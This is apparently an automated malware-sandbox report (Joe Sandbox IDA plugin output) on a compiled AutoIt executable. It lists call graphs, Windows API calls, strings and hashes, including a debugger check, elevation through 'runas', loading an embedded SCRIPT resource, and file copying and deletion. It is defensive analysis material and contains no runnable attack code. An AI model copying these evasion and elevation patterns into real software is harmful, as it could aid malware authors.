107333 bf7cab 59 API calls 107333->107335 107334 bf7b2e 59 API calls 107334->107335 107335->107312 107335->107313 107335->107314 107335->107315 107335->107317 107335->107319 107335->107320 107335->107323 
107335->107328 107335->107332 107335->107333 107335->107334 107337 c57962 107336->107337 107338 c10db6 Mailbox 59 API calls 107337->107338 107339 c57970 107338->107339 107340 bf7667 59 API calls 107339->107340 107341 c5797e 107339->107341 107340->107341 107341->107128 107428 c460c0 107342->107428 107344 c4618c 107344->107128 107345->107152 107346->107152 107347->107128 107348->107168 107349->107156 107350->107159 107351->107128 107352->107138 107353->107164 107354->107164 107355->107164 107356->107148 107357->107151 107358->107148 107360 c2f7d6 107359->107360 107361 bf9aa8 107359->107361 107362 c2f7e7 107360->107362 107363 bf7bcc 59 API calls 107360->107363 107366 c10db6 Mailbox 59 API calls 107361->107366 107364 bf7d8c 59 API calls 107362->107364 107363->107362 107365 c2f7f1 107364->107365 107369 bf9ad4 107365->107369 107370 bf7667 59 API calls 107365->107370 107367 bf9abb 107366->107367 107367->107365 107368 bf9ac6 107367->107368 107368->107369 107371 bf7de1 59 API calls 107368->107371 107369->107180 107369->107183 107370->107369 107371->107369 107373 bf557d 107372->107373 107374 bf55a2 107372->107374 107373->107374 107378 bf558c 107373->107378 107375 bf7d8c 59 API calls 107374->107375 107379 c5325e 107375->107379 107376 c5328d 107376->107206 107380 bf5ab8 59 API calls 107378->107380 107379->107376 107394 c531fa ReadFile SetFilePointerEx 107379->107394 107395 bf7924 59 API calls 2 library calls 107379->107395 107381 c5337e 107380->107381 107383 bf54d2 61 API calls 107381->107383 107384 c5338c 107383->107384 107386 c5339c Mailbox 107384->107386 107396 bf77da 61 API calls Mailbox 107384->107396 107386->107206 107387->107182 107388->107211 107389->107212 107390->107183 107391->107183 107392->107205 107393->107210 107394->107379 107395->107379 107396->107386 107397->107274 107398->107235 107399->107264 107400->107264 107402 c05ace 59 API calls 107401->107402 107403 c05b20 107402->107403 107409 c05b2f 107403->107409 107424 c066e1 61 API calls 2 library calls 
107403->107424 107405 c10db6 Mailbox 59 API calls 107406 c05b59 107405->107406 107406->107290 107407 c05b7c 107407->107406 107425 c05c32 59 API calls Mailbox 107407->107425 107409->107405 107411 bf8047 59 API calls 107410->107411 107412 c05bd2 107411->107412 107412->107296 107414 c461d4 107413->107414 107415 c461c6 107413->107415 107417 bf774d 59 API calls 107414->107417 107416 bf7d2c 59 API calls 107415->107416 107418 c461d2 107416->107418 107417->107418 107418->107299 107420 c05ad8 107419->107420 107421 bf7d8c 59 API calls 107420->107421 107422 c05af3 107421->107422 107422->107291 107423->107294 107424->107407 107425->107409 107426->107335 107427->107315 107429 c460e8 107428->107429 107430 c460cb 107428->107430 107429->107344 107430->107429 107432 c460ab 59 API calls Mailbox 107430->107432 107432->107430

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BF3B68
                                                  • IsDebuggerPresent.KERNEL32 ref: 00BF3B7A
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CB52F8,00CB52E0,?,?), ref: 00BF3BEB
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                    • Part of subcall function 00C0092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BF3C14,00CB52F8,?,?,?), ref: 00C0096E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF3C6F
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CA7770,00000010), ref: 00C2D281
                                                  • SetCurrentDirectoryW.KERNEL32(?,00CB52F8,?,?,?), ref: 00C2D2B9
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CA4260,00CB52F8,?,?,?), ref: 00C2D33F
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C2D346
                                                    • Part of subcall function 00BF3A46: GetSysColorBrush.USER32(0000000F), ref: 00BF3A50
                                                    • Part of subcall function 00BF3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00BF3A5F
                                                    • Part of subcall function 00BF3A46: LoadIconW.USER32(00000063), ref: 00BF3A76
                                                    • Part of subcall function 00BF3A46: LoadIconW.USER32(000000A4), ref: 00BF3A88
                                                    • Part of subcall function 00BF3A46: LoadIconW.USER32(000000A2), ref: 00BF3A9A
                                                    • Part of subcall function 00BF3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF3AC0
                                                    • Part of subcall function 00BF3A46: RegisterClassExW.USER32(?), ref: 00BF3B16
                                                    • Part of subcall function 00BF39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF3A03
                                                    • Part of subcall function 00BF39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3A24
                                                    • Part of subcall function 00BF39D5: ShowWindow.USER32(00000000,?,?), ref: 00BF3A38
                                                    • Part of subcall function 00BF39D5: ShowWindow.USER32(00000000,?,?), ref: 00BF3A41
                                                    • Part of subcall function 00BF434A: _memset.LIBCMT ref: 00BF4370
                                                    • Part of subcall function 00BF434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF4415
                                                  Strings
                                                  • This is a third-party compiled AutoIt script., xrefs: 00C2D279
                                                  • runas, xrefs: 00C2D33A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3287110873
                                                  • Opcode ID: 93e3ed5c2d52c9626d72603e648192f6241f8eec1c664d0460c1f5cd1854ec4f
                                                  • Instruction ID: 9768666b2124134d592eb4f57d723d3a49cc575d0d6be9e5a2b09ffd28f2dc2d
                                                  • Opcode Fuzzy Hash: 93e3ed5c2d52c9626d72603e648192f6241f8eec1c664d0460c1f5cd1854ec4f
                                                  • Instruction Fuzzy Hash: BE51C57094920CAADF11EBB4EC55BFD7BF4EF15700F0041E9F656A71A2CA704A49CB22

                                                  Control-flow Graph

                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00BF49CD
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • GetCurrentProcess.KERNEL32(?,00C7FAEC,00000000,00000000,?), ref: 00BF4A9A
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00BF4AA1
                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BF4AE7
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00BF4AF2
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BF4B23
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BF4B2F
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: eeb60a14ec5f32ac7acd4097455d81e67344f4dea197296eaea532ad9632dabd
                                                  • Instruction ID: 640a6e17381d5bb9b20635ac496eb931cfe40d120f82eeeb02f75561b91b7ee8
                                                  • Opcode Fuzzy Hash: eeb60a14ec5f32ac7acd4097455d81e67344f4dea197296eaea532ad9632dabd
                                                  • Instruction Fuzzy Hash: 0091C331989BC4DEC731CB6894902BBBFF5AF3A300B4449ADD1CB93A42D324A94CD759

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00BF4D8E,?,?,00000000,00000000), ref: 00BF4E99
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BF4D8E,?,?,00000000,00000000), ref: 00BF4EB0
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00BF4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BF4E2F), ref: 00C2D937
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00BF4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BF4E2F), ref: 00C2D94C
                                                  • LockResource.KERNEL32(00BF4D8E,?,?,00BF4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BF4E2F,00000000), ref: 00C2D95F
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 1a74386996a2ec740801d9c899ff5b22eb7708268d14061eabb6de45d919959c
                                                  • Instruction ID: 667c31131bc966a553fc548a858b178f8d9656ea053daf98bb1a430d3c592e32
                                                  • Opcode Fuzzy Hash: 1a74386996a2ec740801d9c899ff5b22eb7708268d14061eabb6de45d919959c
                                                  • Instruction Fuzzy Hash: 02118C70200304ABD7258B65EC88F3B7BBAFBC5B11F20826CF60A86250DB61E845C660
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID:
                                                  • API String ID: 3964851224-0
                                                  • Opcode ID: 3f7673762c9af9cfbb5894744b3d3fab0f0f45b061e85b78e33ffbde6d452426
                                                  • Instruction ID: 3071267dcb8f5ac55fa99ed3203490d0b064083781e0b0ae4f871ea89c0ed55f
                                                  • Opcode Fuzzy Hash: 3f7673762c9af9cfbb5894744b3d3fab0f0f45b061e85b78e33ffbde6d452426
                                                  • Instruction Fuzzy Hash: 84928A706083418FD724DF14C480B2AB7E1BF89304F25896DF99A8B3A2D775ED85CB92
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00C2E398), ref: 00C5446A
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00C5447B
                                                  • FindClose.KERNEL32(00000000), ref: 00C5448B
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 557838c8bf95218aa081431e7a6d79dd7288d69045b1ef167c5aa2a0cb1826ae
                                                  • Instruction ID: 8e9137f250d259f748fea034e94f0d2f5b134490c20ca29225366bbcad2b5a1d
                                                  • Opcode Fuzzy Hash: 557838c8bf95218aa081431e7a6d79dd7288d69045b1ef167c5aa2a0cb1826ae
                                                  • Instruction Fuzzy Hash: 55E0D8374145006743146B38EC4D6ED775C9F0533AF100719FD39C10E0E77459C49699
                                                  Strings
                                                  • Variable must be of type 'Object'., xrefs: 00C33E62
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.
                                                  • API String ID: 0-109567571
                                                  • Opcode ID: e19a946cbd1e33e45564934d2934324e21abb8510cc63ccf7af4a4bf5da626e3
                                                  • Instruction ID: 6fa043a45a6855104b345fde7d8de441ca02633c556d87436e6adfa0454efc1a
                                                  • Opcode Fuzzy Hash: e19a946cbd1e33e45564934d2934324e21abb8510cc63ccf7af4a4bf5da626e3
                                                  • Instruction Fuzzy Hash: 35A25B75A00209CBCB24CF58C480ABDB7F1FF59314F2481A9EA25AB361D775ED4ACB91
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C00A5B
                                                  • timeGetTime.WINMM ref: 00C00D16
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C00E53
                                                  • Sleep.KERNEL32(0000000A), ref: 00C00E61
                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00C00EFA
                                                  • DestroyWindow.USER32 ref: 00C00F06
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C00F20
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00C34E83
                                                  • TranslateMessage.USER32(?), ref: 00C35C60
                                                  • DispatchMessageW.USER32(?), ref: 00C35C6E
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C35C82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4212290369-3242690629
                                                  • Opcode ID: c2f80d3e89676ae560388ffc6fe3bbff83140ee3c7ee0786effdda438d2536d0
                                                  • Instruction ID: c37d090b934be823297503d2718d1c15b133aafb83701002939dfbc594963126
                                                  • Opcode Fuzzy Hash: c2f80d3e89676ae560388ffc6fe3bbff83140ee3c7ee0786effdda438d2536d0
                                                  • Instruction Fuzzy Hash: 9FB2F370608741DFD728DF24C884BAEB7E4BF84304F24491DF5A9972A1CB71E989DB92

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00C58F5F: __time64.LIBCMT ref: 00C58F69
                                                    • Part of subcall function 00BF4EE5: _fseek.LIBCMT ref: 00BF4EFD
                                                  • __wsplitpath.LIBCMT ref: 00C59234
                                                    • Part of subcall function 00C140FB: __wsplitpath_helper.LIBCMT ref: 00C1413B
                                                  • _wcscpy.LIBCMT ref: 00C59247
                                                  • _wcscat.LIBCMT ref: 00C5925A
                                                  • __wsplitpath.LIBCMT ref: 00C5927F
                                                  • _wcscat.LIBCMT ref: 00C59295
                                                  • _wcscat.LIBCMT ref: 00C592A8
                                                    • Part of subcall function 00C58FA5: _memmove.LIBCMT ref: 00C58FDE
                                                    • Part of subcall function 00C58FA5: _memmove.LIBCMT ref: 00C58FED
                                                  • _wcscmp.LIBCMT ref: 00C591EF
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59824
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59837
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C59452
                                                  • _wcsncpy.LIBCMT ref: 00C594C5
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00C594FB
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C59511
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C59522
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C59534
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: 8791e343711698885e4a892747429047c196d35035d017d9f340c8f7285f8375
                                                  • Instruction ID: 70e259dc27004e4c8e5a4368b7ab965156d515e1887db440186a9fba8424e442
                                                  • Opcode Fuzzy Hash: 8791e343711698885e4a892747429047c196d35035d017d9f340c8f7285f8375
                                                  • Instruction Fuzzy Hash: 2DC14CB5D00219ABDF21DF95CC81AEEB7BDEF45310F0040AAF609E7151EB309A899F65

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BF3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BF309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BF30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BF30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 097b1ee3b41ca375e36c42c7e2e34155f4d2ac5953c94e0a922c7e69a124d7cb
                                                  • Instruction ID: 9662206b455b111d8ac5d3faa6a0fdace8c436f5aae924e072e8bd38f8886a17
                                                  • Opcode Fuzzy Hash: 097b1ee3b41ca375e36c42c7e2e34155f4d2ac5953c94e0a922c7e69a124d7cb
                                                  • Instruction Fuzzy Hash: F021E4B1941209AFDB50DFA4E889BDDBBF4FB08320F14462EE594E62A0D7B54582CF91

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BF3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BF309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BF30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BF30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: f9719c9f7acedf5cd37a3464043de130cbb51affd07ab9cb8987f0dd4802fd55
                                                  • Instruction ID: 2d0d061fd8b33bad87175b0ca203c60c8b68bafabc0c4051a23b780e8b1d251a
                                                  • Opcode Fuzzy Hash: f9719c9f7acedf5cd37a3464043de130cbb51affd07ab9cb8987f0dd4802fd55
                                                  • Instruction Fuzzy Hash: 3521D8B1D41218AFDB00DFA4EC89BDDBBF4FB08710F00822AF514A62A0D7B24585CF91

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00BF4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CB52F8,?,00BF37AE,?), ref: 00BF4724
                                                    • Part of subcall function 00C1050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BF7165), ref: 00C1052D
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BF71A8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C2E8C8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C2E909
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C2E947
                                                  • _wcscat.LIBCMT ref: 00C2E9A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
                                                  • Opcode ID: 57ec127e0f2c11875a801fa31117e3496c540d35e8d5a9d1d33ce2bcd3069e79
                                                  • Instruction ID: 156abe555a9b804cee5ef2388dcfa3b52e3abc3385540488c4de4a3ccf882abd
                                                  • Opcode Fuzzy Hash: 57ec127e0f2c11875a801fa31117e3496c540d35e8d5a9d1d33ce2bcd3069e79
                                                  • Instruction Fuzzy Hash: 4371BF711083159ED704EF69EC81AAFBBE8FF89310F40466EF545D72A0DB749988CB92

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BF3A50
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00BF3A5F
                                                  • LoadIconW.USER32(00000063), ref: 00BF3A76
                                                  • LoadIconW.USER32(000000A4), ref: 00BF3A88
                                                  • LoadIconW.USER32(000000A2), ref: 00BF3A9A
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF3AC0
                                                  • RegisterClassExW.USER32(?), ref: 00BF3B16
                                                    • Part of subcall function 00BF3041: GetSysColorBrush.USER32(0000000F), ref: 00BF3074
                                                    • Part of subcall function 00BF3041: RegisterClassExW.USER32(00000030), ref: 00BF309E
                                                    • Part of subcall function 00BF3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF30AF
                                                    • Part of subcall function 00BF3041: InitCommonControlsEx.COMCTL32(?), ref: 00BF30CC
                                                    • Part of subcall function 00BF3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF30DC
                                                    • Part of subcall function 00BF3041: LoadIconW.USER32(000000A9), ref: 00BF30F2
                                                    • Part of subcall function 00BF3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 710b87851a84c5b45025ae9252555a6302fe32932c45351e91553c8c6bc9c6fb
                                                  • Instruction ID: cd2d7ff92f2acb571cda9a0568c6addc70eb177eaf436f8c0cdc864aeae2b62f
                                                  • Opcode Fuzzy Hash: 710b87851a84c5b45025ae9252555a6302fe32932c45351e91553c8c6bc9c6fb
                                                  • Instruction Fuzzy Hash: AC214671D02308AFEB15DFA4EC49BAD7BF0FB08711F00426AF604AB2A1D7B55A548F85

                                                   Control-flow Graph (rendered graph not extracted; its Executed / Not Executed legend refers to block colouring)
                                                   • Basic blocks of 00BF3633 and their calls: 00BF36CA DefWindowProcW (common default path, continuing at 00BF36D8); 00BF36F9 KillTimer, then calls to 00BF443A and 00BF3114; 00BF3715 SetTimer, RegisterWindowMessageW; 00BF373E CreatePopupMenu; 00BF374B PostQuitMessage; 00C2D097 SetFocus; 00C2D0A8 MoveWindow; further blocks call 00C01070, 00C01093, 00C52527, 00C47C36, 00C52D36, 00BF44A0 and 00BF434A.
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00BF36D2
                                                  • KillTimer.USER32(?,00000001), ref: 00BF36FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF371F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF372A
                                                  • CreatePopupMenu.USER32 ref: 00BF373E
                                                  • PostQuitMessage.USER32(00000000), ref: 00BF374D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 8cb48ec89a9467a6d4382581c445f6698433b535d3bb243e050e3dddf18f1997
